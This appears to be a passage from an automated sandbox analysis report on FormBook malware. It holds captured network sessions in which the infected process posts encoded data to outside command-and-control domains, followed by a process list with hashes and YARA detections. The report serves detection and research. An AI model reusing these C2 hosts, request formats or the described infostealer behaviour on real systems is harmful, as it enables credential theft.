65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Oct 10, 2024 14:14:40.818551064 CEST	1236	IN	Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
Oct 10, 2024 14:14:40.818566084 CEST	698	IN	Data Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50031	103.42.108.46	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:14:46.638449907 CEST	807	OUT	POST /9qeb/ HTTP/1.1 Host: www.mtmoriacolives.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 201 Origin: http://www.mtmoriacolives.store Referer: http://www.mtmoriacolives.store/9qeb/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 57 68 2b 76 34 59 6e 6d 6d 41 79 76 54 6a 6d 47 35 67 4d 4f 71 4a 5a 4c 6d 71 57 63 4d 59 2b 51 31 2b 78 44 36 39 4f 76 7a 65 59 74 4b 4f 53 4b 62 79 63 46 56 32 30 55 59 71 49 6b 76 47 32 70 50 33 47 79 48 4c 71 75 4b 64 41 51 38 4d 32 39 63 69 45 53 79 35 50 64 2f 67 76 36 70 4d 30 6b 6c 73 6d 6e 76 31 51 41 4e 33 47 38 4a 32 36 37 79 4d 33 56 51 30 30 6e 4a 71 4e 50 78 4d 7a 54 63 68 34 46 6a 44 56 65 76 32 4c 6f 4b 47 59 38 57 5a 32 70 68 67 72 71 36 67 46 42 54 65 41 7a 33 43 4e 34 50 48 6f 33 39 5a 74 62 73 64 41 6f 74 66 78 36 63 2b 63 49 79 63 52 67 39 6f 49 44 2f 77 3d 3d Data Ascii: DX3L=Wh+v4YnmmAyvTjmG5gMOqJZLmqWcMY+Q1+xD69OvzeYtKOSKbycFV20UYqIkvG2pP3GyHLquKdAQ8M29ciESy5Pd/gv6pM0klsmnv1QAN3G8J267yM3VQ00nJqNPxMzTch4FjDVev2LoKGY8WZ2phgrq6gFBTeAz3CN4PHo39ZtbsdAotfx6c+cIycRg9oID/w==
Oct 10, 2024 14:14:47.611107111 CEST	154	IN	HTTP/1.1 403 Forbidden Content-Type: text/plain; charset=utf-8 Date: Thu, 10 Oct 2024 12:14:47 GMT Content-Length: 11 Connection: close Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
Oct 10, 2024 14:14:47.934367895 CEST	154	IN	HTTP/1.1 403 Forbidden Content-Type: text/plain; charset=utf-8 Date: Thu, 10 Oct 2024 12:14:47 GMT Content-Length: 11 Connection: close Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50032	103.42.108.46	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:14:49.190459013 CEST	827	OUT	POST /9qeb/ HTTP/1.1 Host: www.mtmoriacolives.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 221 Origin: http://www.mtmoriacolives.store Referer: http://www.mtmoriacolives.store/9qeb/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 57 68 2b 76 34 59 6e 6d 6d 41 79 76 53 41 75 47 71 58 51 4f 37 5a 5a 49 37 61 57 63 48 34 2b 55 31 2b 39 44 36 34 69 47 79 73 38 74 4b 73 61 4b 59 7a 63 46 53 32 30 55 4b 4b 49 72 77 57 32 59 50 33 4c 42 48 4a 75 75 4b 63 67 51 38 4d 6d 39 63 56 59 52 39 4a 50 66 77 41 76 30 6e 73 30 6b 6c 73 6d 6e 76 31 55 36 4e 7a 53 38 4a 6a 79 37 79 74 33 61 54 30 30 6b 5a 4b 4e 50 6e 38 7a 58 63 68 35 51 6a 48 56 6b 76 30 44 6f 4b 48 6f 38 57 4d 61 32 36 77 71 6a 31 41 46 65 59 71 5a 63 77 78 30 78 49 58 6b 46 37 64 63 33 74 62 52 79 38 75 51 74 4f 2b 34 37 76 62 59 55 77 72 31 4b 6b 78 48 43 70 55 68 6e 6c 6f 46 39 67 45 69 70 2f 4d 2f 67 30 38 30 3d Data Ascii: DX3L=Wh+v4YnmmAyvSAuGqXQO7ZZI7aWcH4+U1+9D64iGys8tKsaKYzcFS20UKKIrwW2YP3LBHJuuKcgQ8Mm9cVYR9JPfwAv0ns0klsmnv1U6NzS8Jjy7yt3aT00kZKNPn8zXch5QjHVkv0DoKHo8WMa26wqj1AFeYqZcwx0xIXkF7dc3tbRy8uQtO+47vbYUwr1KkxHCpUhnloF9gEip/M/g080=
Oct 10, 2024 14:14:50.083714962 CEST	154	IN	HTTP/1.1 403 Forbidden Content-Type: text/plain; charset=utf-8 Date: Thu, 10 Oct 2024 12:14:49 GMT Content-Length: 11 Connection: close Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50033	103.42.108.46	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:14:51.747872114 CEST	10909	OUT	POST /9qeb/ HTTP/1.1 Host: www.mtmoriacolives.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 10301 Origin: http://www.mtmoriacolives.store Referer: http://www.mtmoriacolives.store/9qeb/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 57 68 2b 76 34 59 6e 6d 6d 41 79 76 53 41 75 47 71 58 51 4f 37 5a 5a 49 37 61 57 63 48 34 2b 55 31 2b 39 44 36 34 69 47 79 73 30 74 4b 2f 43 4b 59 55 6f 46 54 32 30 55 4a 4b 4a 73 77 57 32 46 50 30 37 65 48 4a 69 59 4b 59 51 51 74 66 2b 39 61 6e 77 52 71 35 50 66 79 41 76 31 70 4d 30 31 6c 73 32 6a 76 31 45 36 4e 7a 53 38 4a 69 43 37 31 38 33 61 65 55 30 6e 4a 71 4e 49 78 4d 79 79 63 68 67 6e 6a 48 59 5a 76 45 6a 6f 4b 6e 34 38 55 2b 69 32 6e 67 71 74 77 41 45 4c 59 76 42 44 77 78 6f 58 49 55 35 59 37 61 73 33 76 75 51 65 73 4b 41 4e 56 34 67 59 37 34 39 75 31 61 64 48 6f 41 58 42 6f 6d 4a 42 6e 4c 59 55 6b 46 48 31 74 66 6e 55 69 37 73 48 66 4a 36 78 75 34 51 68 41 68 45 6b 79 73 47 66 76 7a 6c 43 77 41 6d 55 54 79 6b 74 52 64 4b 59 6c 59 49 41 53 4a 73 53 35 65 53 4c 62 6d 6a 4a 73 42 30 37 61 78 4e 43 45 74 57 48 62 6a 58 56 78 61 4c 51 59 56 6c 71 34 39 41 74 54 52 6e 67 63 53 70 36 59 76 70 53 59 45 75 72 6d 77 72 76 55 6f 46 71 79 65 6e 54 6e 6f 75 38 41 55 4a 36 41 33 75 78 52 [TRUNCATED] Data Ascii: DX3L=Wh+v4YnmmAyvSAuGqXQO7ZZI7aWcH4+U1+9D64iGys0tK/CKYUoFT20UJKJswW2FP07eHJiYKYQQtf+9anwRq5PfyAv1pM01ls2jv1E6NzS8JiC7183aeU0nJqNIxMyychgnjHYZvEjoKn48U+i2ngqtwAELYvBDwxoXIU5Y7as3vuQesKANV4gY749u1adHoAXBomJBnLYUkFH1tfnUi7sHfJ6xu4QhAhEkysGfvzlCwAmUTyktRdKYlYIASJsS5eSLbmjJsB07axNCEtWHbjXVxaLQYVlq49AtTRngcSp6YvpSYEurmwrvUoFqyenTnou8AUJ6A3uxRiySs/2gdq4iQMZfaZFQDmVxUugZ2u1pXYmZDPNS/a/CnwfEJL68JYb8FYTt7KkmYQfpwqRA6N/1YwvdyW5sOo7IljzGsnAKGjEI5biLDy8JOsgCYf48AVZ9Rf9VHVA6xET7hxqSag675sTN+52keUA9YpFzxA/XsQ9VMI8VVgY0LC97wH9zQ3FHBNFyci78FRcxzXwogBlLsA6uzrLiYu3Vun6EHK1ff6H4YRgi9PW3I6EvF4JATkA6qVfGSEXFWI9Ol3qd0JZL29+lHLDQ4lD9dmpcTE8saQ2XzZ134HTovl0pV/pqGFlZ3kiADyNu42rJpJCIeUlJ43v6s0Y9u58KzjhIEozPBB0aKtn9F+SBZrxks3kkJre5QGKTn0cPm512ytH5ssVmizgcNpis+MigY9GFz4wHfIFbW+xPwkgT53QiCwA7za1KUeC776rwrqkt5d4vhtEu/2SFEFe8zytQTgj5XPnJtOjMO9F0NtWPrczaxHOZ+08wCIiUJWmggeOLs0KxQ5E4UpOJ3XuYJj2U1+sgb8w6xc2SqGlk9WKF6fhxP/fpUVlvDL2/pgLlqe3WILNh9dCsLGXn3MPR5O93jR5AFyfft24sFA92cKAC75lrbWxVNfoxJhmaewsWu/T2wI4f7JTp3+7Gpixdq3oELC7QLPvbs5h [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50034	103.42.108.46	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:14:55.268307924 CEST	523	OUT	GET /9qeb/?GHcxP=10HpjR&DX3L=bjWP7v7ghBDzXzyUz1pTmuBWkZf8Gbbxz/lu39Kx9tYOJM2dcjRzdERKOpdTxXm5FHukDI2cLaYm1fi8ZVMT+/mexgX4lNkHmuy2vWEgUyuWeWm6+/LtdWg= HTTP/1.1 Host: www.mtmoriacolives.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Oct 10, 2024 14:14:56.175002098 CEST	154	IN	HTTP/1.1 403 Forbidden Content-Type: text/plain; charset=utf-8 Date: Thu, 10 Oct 2024 12:14:56 GMT Content-Length: 11 Connection: close Data Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50035	85.159.66.93	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:15:09.572360992 CEST	795	OUT	POST /xofx/ HTTP/1.1 Host: www.gloryastore.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 201 Origin: http://www.gloryastore.site Referer: http://www.gloryastore.site/xofx/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 32 49 62 66 65 42 70 33 6e 41 31 37 71 48 2f 4c 2f 6c 52 70 65 63 71 65 4b 69 58 37 73 42 77 61 62 55 62 63 46 75 52 4b 72 38 56 4a 46 6a 6d 6e 6d 64 38 49 38 53 4e 42 4e 46 53 54 33 31 78 33 4e 78 68 35 4a 42 69 6e 5a 5a 41 44 39 76 78 62 64 4d 6f 61 6a 4f 78 2f 62 38 69 70 4a 72 75 7a 36 6a 77 76 53 6b 6b 67 77 64 72 4a 75 2b 48 57 74 4a 76 64 49 74 72 50 64 49 54 55 56 58 6d 77 58 56 30 44 46 59 30 68 41 61 4c 56 7a 76 6b 57 69 36 41 69 78 72 7a 30 38 55 65 53 2b 39 58 5a 62 67 4a 69 51 73 52 70 50 35 43 36 73 6c 69 4f 4b 2b 42 59 76 6f 79 73 2f 66 4c 4c 56 55 69 6a 65 67 3d 3d Data Ascii: DX3L=2IbfeBp3nA17qH/L/lRpecqeKiX7sBwabUbcFuRKr8VJFjmnmd8I8SNBNFST31x3Nxh5JBinZZAD9vxbdMoajOx/b8ipJruz6jwvSkkgwdrJu+HWtJvdItrPdITUVXmwXV0DFY0hAaLVzvkWi6Aixrz08UeS+9XZbgJiQsRpP5C6sliOK+BYvoys/fLLVUijeg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50036	85.159.66.93	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:15:12.200325012 CEST	815	OUT	POST /xofx/ HTTP/1.1 Host: www.gloryastore.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 221 Origin: http://www.gloryastore.site Referer: http://www.gloryastore.site/xofx/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 32 49 62 66 65 42 70 33 6e 41 31 37 72 6e 76 4c 34 47 35 70 57 63 71 66 48 79 58 37 6c 68 77 65 62 55 66 63 46 73 39 61 72 4f 78 4a 46 42 2b 6e 6c 59 49 49 39 53 4e 42 56 56 53 4b 6f 6c 78 47 4e 78 64 78 4a 42 75 6e 5a 64 67 44 39 74 35 62 64 2f 77 5a 78 75 78 78 43 73 69 76 48 4c 75 7a 36 6a 77 76 53 6e 5a 6f 77 64 7a 4a 76 50 58 57 69 49 76 61 4a 74 72 49 61 49 54 55 45 6e 6d 30 58 56 31 57 46 5a 6f 48 41 65 37 56 7a 71 59 57 69 50 73 68 6f 62 7a 79 79 30 66 42 77 50 65 69 62 41 6f 59 4f 74 74 7a 46 36 36 32 67 44 7a 55 62 50 67 50 39 6f 57 66 69 59 43 2f 59 58 66 71 46 6b 77 54 79 70 37 76 61 65 7a 4a 71 47 4a 78 44 50 41 6f 46 67 34 3d Data Ascii: DX3L=2IbfeBp3nA17rnvL4G5pWcqfHyX7lhwebUfcFs9arOxJFB+nlYII9SNBVVSKolxGNxdxJBunZdgD9t5bd/wZxuxxCsivHLuz6jwvSnZowdzJvPXWiIvaJtrIaITUEnm0XV1WFZoHAe7VzqYWiPshobzyy0fBwPeibAoYOttzF662gDzUbPgP9oWfiYC/YXfqFkwTyp7vaezJqGJxDPAoFg4=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50037	85.159.66.93	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:15:14.747878075 CEST	10897	OUT	POST /xofx/ HTTP/1.1 Host: www.gloryastore.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Connection: close Content-Length: 10301 Origin: http://www.gloryastore.site Referer: http://www.gloryastore.site/xofx/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Raw: 44 58 33 4c 3d 32 49 62 66 65 42 70 33 6e 41 31 37 72 6e 76 4c 34 47 35 70 57 63 71 66 48 79 58 37 6c 68 77 65 62 55 66 63 46 73 39 61 72 4f 35 4a 45 30 71 6e 6e 37 51 49 73 69 4e 42 4c 46 53 50 6f 6c 78 68 4e 31 78 31 4a 42 54 46 5a 62 73 44 2f 49 31 62 56 75 77 5a 36 75 78 78 66 38 69 75 4a 72 75 6d 36 6a 67 7a 53 6b 78 6f 77 64 7a 4a 76 4d 66 57 6d 5a 76 61 4c 74 72 50 64 49 54 69 56 58 6d 51 58 57 46 47 46 5a 39 38 41 50 48 56 77 4c 6f 57 78 64 30 68 67 62 7a 77 78 30 65 47 77 50 43 39 62 44 4d 6c 4f 74 4a 4e 46 39 61 32 67 48 2b 6c 43 63 6b 47 69 62 58 4d 79 4a 2b 76 44 33 58 6f 4c 6c 6b 75 35 35 58 59 41 71 71 71 6f 47 42 31 58 38 41 7a 5a 56 32 34 6f 4f 49 30 6a 35 75 54 67 44 6d 7a 42 39 74 5a 6a 6d 32 56 61 43 6f 6b 43 46 76 52 6e 75 6c 33 63 39 44 5a 6c 77 6f 75 77 75 45 51 44 6f 66 59 54 63 48 42 75 48 50 4b 43 68 70 55 55 65 6d 39 54 34 65 77 79 56 6d 75 67 4a 50 31 59 68 31 56 72 31 6c 2b 35 43 72 74 7a 46 6c 64 4c 4d 71 42 54 73 37 48 62 70 47 55 67 43 79 45 49 6e 7a 58 72 69 59 4d 4d [TRUNCATED] Data Ascii: DX3L=2IbfeBp3nA17rnvL4G5pWcqfHyX7lhwebUfcFs9arO5JE0qnn7QIsiNBLFSPolxhN1x1JBTFZbsD/I1bVuwZ6uxxf8iuJrum6jgzSkxowdzJvMfWmZvaLtrPdITiVXmQXWFGFZ98APHVwLoWxd0hgbzwx0eGwPC9bDMlOtJNF9a2gH+lCckGibXMyJ+vD3XoLlku55XYAqqqoGB1X8AzZV24oOI0j5uTgDmzB9tZjm2VaCokCFvRnul3c9DZlwouwuEQDofYTcHBuHPKChpUUem9T4ewyVmugJP1Yh1Vr1l+5CrtzFldLMqBTs7HbpGUgCyEInzXriYMMFGLRbbcplwc70kHmEt5y8BUDcfkeh+b7SeWUoxbWsWq0q8f8UHJ6JD+IXBpDzDroHnzuGZFQ8eQQx5rajfIrcVxq2DxO02hOykYrFUSHZ5oMkasZGGWLK/VLxdLZ8hXmziKu4Z7HaA/PP5tTBD5Ycp12B6ZX/Js4bp2dMcvroRQw/zEC0kOC56TpLmGo/YEHA0NbBKuvQ6Gy8VwQOcQsHSz2GBPQ/rKeFYImn8HTIzenatZp5CPC6HvIvQxQYq3Mgh/xuEadZBE8NFovu6CeivqEKyM4VY/+pzbboobHE59MdqdDxq2XnogISkWcxbqgeV4cZp0dQewUTxZ8GeUXBgFm206m+mCIIHSztKR+ZQ/VUxgEyfxrIbIZkDoX5CvTC/wGFPRlyXCtMdCajqT4BQ41oBLMFQCPrj96qDdRqW4hOVR/KwZc11VycAt6zxmvc8TNgSGHmSBRiKnCnLgioAQj99sb9bdMIueNvpkDLmKvmnSHbNwruA+eng/wqOhuPeRSHXciSHMQznqp3+ymEo+Ihnqpk/s0uQSRcBqv0969iBk5g1W+aiS3Zx3qsXWSYxkkE4THEpd9DLLgEdvMctvKK748kuYswApqJ1fw3c8459O40OQC5phn9UoAC7qt7Zp7Asshow756lOGzUm+tWAncjPXDe7cLQ [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50038	85.159.66.93	80	2128	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe

Timestamp	Bytes transferred	Direction	Data
Oct 10, 2024 14:15:17.294003963 CEST	519	OUT	GET /xofx/?GHcxP=10HpjR&DX3L=7Kz/d1Mn0itGo3PcxGtVXIDKGx/doyF9AQrzLtlTvtwBfjS8t6Z4ijhUFUW9pm5QBgNFDTiCIqoC/P9QUMAo19NGVuOnOfO55joMFXlim+H5rqnxtr/5GeI= HTTP/1.1 Host: www.gloryastore.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SGH-I337M Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36

Target ID:	0
Start time:	08:11:56
Start date:	10/10/2024
Path:	C:\Users\user\Desktop\alWUxZvrvU.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\alWUxZvrvU.exe"
Imagebase:	0xc70000
File size:	284'672 bytes
MD5 hash:	68E26FFF2E508BFECF7FCC9A2C0C8805
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1907228716.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1910147951.0000000005300000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1910147951.0000000005300000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1907545517.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1907545517.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:12:11
Start date:	10/10/2024
Path:	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe"
Imagebase:	0xcb0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.4157755102.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.4157755102.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	08:12:13
Start date:	10/10/2024
Path:	C:\Windows\SysWOW64\MRINFO.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\MRINFO.EXE"
Imagebase:	0x8c0000
File size:	14'336 bytes
MD5 hash:	F664A3E4625D86FC6B389AFF416CF67F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4156687615.0000000002980000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4156687615.0000000002980000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4157003004.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4157003004.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4156953993.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4156953993.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	08:12:27
Start date:	10/10/2024
Path:	C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\xChHxPoVqnhsDLCaQMJvTOFUCOisYFTycCwynlrmhToihKSHpANCjLTrAwJ\ZVRmRlsEcS.exe"
Imagebase:	0xcb0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	08:12:39
Start date:	10/10/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.3%
